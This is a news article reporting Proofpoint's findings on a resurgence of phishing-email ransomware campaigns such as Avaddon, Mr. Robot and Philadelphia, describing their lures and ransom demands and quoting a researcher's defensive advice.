Ransomware: Attacks that start with phishing emails are suddenly back in fashion again

Email was once the main method for delivering ransomware. Now familiar and new forms of ransomware are using it again.
Written by Danny Palmer, Senior Writer

Ransomware attacks via email are on the rise again, with several new and familiar forms of ransomware recently being distributed with the aid of malicious payloads in phishing messages.

Email used to be the most prolific way to infect victims with ransomware, but in recent years, attackers have successfully pivoted to using remote ports, insecure public-facing servers and other vulnerabilities in enterprise networks to encrypt entire networks – often demanding hundreds of thousands of dollars in payment to release the data again.

However, in recent weeks, researchers at Proofpoint have seen a rise in the number ransomware attacks being distributed by email – including one from a ransomware that hasn't been active in years – with crooks sending out hundreds of thousands of messages every day. The email attacks use a variety of lures to trick people into opening them, including subject lines related to coronavirus.

SEE: A winning strategy for cybersecurity (ZDNet special report) | Download the report as a PDF (TechRepublic)    

One of the largest email campaigns is by a new ransomware called Avaddon; during one week in June, it was distributed in over one million messages, mainly targeting organisations in the US.

Avaddon uses a somewhat basic technique as a lure, with subject lines claiming to relate to a photo of the victim, preying on the potential vanity or insecurity of the victim. If the attachment is opened, it downloads Avaddon using PowerShell.

Infected computers display a ransom note demanding $800 in bitcoin in exchange for "special software" to decrypt the hard drive.

A form of ransomware-a-service, the attackers behind Avaddon offer a 24/7 'support' service to make sure the victims have the understanding necessary to pay the ransom – and warns that if users attempt to retrieve their files without paying, they'll lose the files forever.

A second email-based ransomware campaign detailed by researchers has been dubbed 'Mr. Robot', which has been targeting entertainment, manufacturing and construction companies across the US. Messages claiming to be from the Department of Health or healthcare services use subjects related to COVID-19 test results in an effort to lure victims into clicking a link to see a document.

If the victim clicks through, this ransomware is installed and the attackers demand $100 in exchange for the return of files. It's a very small amount compared to many ransomware campaigns, suggesting it is targeting home users, rather than businesses.

But it isn't just organisations in North America that are coming under an increasing number of attacks from ransomware via email – they're targeting Europe, too.

Researchers note that Philadelphia ransomware – returning after a three-year hiatus – is targeting manufacturing and food companies in Germany with German-language lures claiming to be from the German government.

The emails claim to contain information about the possible closure of the company due to the COVID-19 pandemic, encouraging the victim to click a link – if they do so, Philadelphia ransomware is installed, with an English-language ransom note demanding a $200 payment.

While the number of email-based ransomware attacks is still small compared to 2016 and 2017, when the likes of Locky, Cerber and GlobeImposter were being distributed in massive volumes of tens of millions, the recent rise in email attacks demonstrates how flexible cyber criminals can be.

"It is a reasonable presumption that this means that email-based ransomware attacks are back on the minds of threat actors. Threat actors tend to be flexible and agile in their work," Sherrod DeGrippo, senior director of threat research and detection at Proofpoint told ZDNet.

"They will focus on what brings the most financial gain and change tactics to get the best results. This may be a testing of the waters to see what success rates are available with this method," she added.

One reason some attackers could have shifted back towards email is because of the number of people who are now working remotely, and the reliance on email that entails. "Email allows threat actors to rely on human behavior to be successful with just one click," said DeGrippo.

In many cases, it's possible to defend against ransomware – and other malware attacks – by ensuring that networks are patched with the latest security updates, preventing attackers from exploiting known software flaws.

SEE: Ransomware: Hackers took just three days to find this fake industrial network and fill it with malware

But businesses should also make plans to cater for the fact that at some point, someone will mistakenly click on a malicious link in a phishing email.

"Businesses must assume that someone within their organization will always click and craft a security strategy that protects people first," said DeGrippo.

"Companies should ensure they are assessing end user vulnerability and training on today's threats providing actionable skills for protecting themselves at work and at home," she added.


Editorial standards